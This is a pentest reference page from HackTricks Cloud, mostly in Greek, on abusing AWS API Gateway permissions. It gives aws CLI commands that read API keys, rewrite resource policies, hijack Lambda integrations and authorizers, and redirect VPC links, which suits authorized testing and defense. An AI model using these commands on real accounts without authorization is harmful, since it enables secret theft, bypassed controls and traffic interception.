AWS - Apigateway Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Apigateway

Για περισσότερες πληροφορίες ελέγξτε:

AWS - API Gateway Enum

`apigateway:POST`

Με αυτή την άδεια μπορείτε να δημιουργήσετε κλειδιά API των APIs που έχουν ρυθμιστεί (ανά περιοχή).

aws --region <region> apigateway create-api-key

Πιθανές Επιπτώσεις: Δεν μπορείτε να κάνετε privesc με αυτή την τεχνική αλλά μπορεί να αποκτήσετε πρόσβαση σε ευαίσθητες πληροφορίες.

`apigateway:GET`

Με αυτή την άδεια μπορείτε να αποκτήσετε τα παραγόμενα API keys των APIs που είναι ρυθμισμένα (ανά περιοχή).

aws --region <region> apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Πιθανές Επιπτώσεις: Δεν μπορείτε να αποκτήσετε δικαιώματα με αυτή την τεχνική, αλλά μπορεί να αποκτήσετε πρόσβαση σε ευαίσθητες πληροφορίες.

`apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`

Με αυτές τις άδειες είναι δυνατόν να τροποποιήσετε την πολιτική πόρου ενός API για να αποκτήσετε πρόσβαση στην κλήση του και να εκμεταλλευτείτε την πιθανή πρόσβαση που μπορεί να έχει το API gateway (όπως η εκτέλεση μιας ευάλωτης lambda).

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Πιθανές Επιπτώσεις: Συνήθως, δεν θα μπορείτε να αποκτήσετε δικαιώματα άμεσης ανύψωσης με αυτή την τεχνική, αλλά μπορεί να αποκτήσετε πρόσβαση σε ευαίσθητες πληροφορίες.

`apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`

Χρειάζεται δοκιμή

Ένας επιτιθέμενος με τις άδειες apigateway:PutIntegration, apigateway:CreateDeployment, και iam:PassRole μπορεί να προσθέσει μια νέα ολοκλήρωση σε μια υπάρχουσα REST API του API Gateway με μια λειτουργία Lambda που έχει συσχετισμένο ρόλο IAM. Ο επιτιθέμενος μπορεί στη συνέχεια να ενεργοποιήσει τη λειτουργία Lambda για να εκτελέσει αυθαίρετο κώδικα και ενδεχομένως να αποκτήσει πρόσβαση στους πόρους που σχετίζονται με τον ρόλο IAM.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Πιθανές Επιπτώσεις: Πρόσβαση σε πόρους που σχετίζονται με τον ρόλο IAM της λειτουργίας Lambda.

`apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`

Χρειάζεται δοκιμή

Ένας επιτιθέμενος με τις άδειες apigateway:UpdateAuthorizer και apigateway:CreateDeployment μπορεί να τροποποιήσει έναν υπάρχοντα εξουσιοδοτητή API Gateway για να παρακάμψει τους ελέγχους ασφαλείας ή να εκτελέσει αυθαίρετο κώδικα όταν γίνονται αιτήματα API.

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Πιθανές Επιπτώσεις: Παράκαμψη ελέγχων ασφαλείας, μη εξουσιοδοτημένη πρόσβαση σε πόρους API.

`apigateway:UpdateVpcLink`

Χρειάζεται δοκιμή

Ένας επιτιθέμενος με την άδεια apigateway:UpdateVpcLink μπορεί να τροποποιήσει έναν υπάρχοντα VPC Link ώστε να δείχνει σε έναν διαφορετικό Network Load Balancer, πιθανώς ανακατευθύνοντας ιδιωτική κίνηση API σε μη εξουσιοδοτημένους ή κακόβουλους πόρους.

bashCopy codeVPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη πρόσβαση σε ιδιωτικούς πόρους API, παρεμβολή ή διακοπή της κυκλοφορίας API.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Privilege Escalation NextAWS - Chime Privesc

Last updated 3 days ago

Apigateway

apigateway:POST

apigateway:GET

apigateway:UpdateRestApiPolicy, apigateway:PATCH

apigateway:PutIntegration, apigateway:CreateDeployment, iam:PassRole

apigateway:UpdateAuthorizer, apigateway:CreateDeployment

apigateway:UpdateVpcLink

Apigateway

apigateway:POST

apigateway:GET

apigateway:UpdateRestApiPolicy, apigateway:PATCH

apigateway:PutIntegration, apigateway:CreateDeployment, iam:PassRole

apigateway:UpdateAuthorizer, apigateway:CreateDeployment

apigateway:UpdateVpcLink

`apigateway:POST`

`apigateway:GET`

`apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`

`apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`

`apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`

`apigateway:UpdateVpcLink`

`apigateway:POST`

`apigateway:GET`

`apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`

`apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`

`apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`

`apigateway:UpdateVpcLink`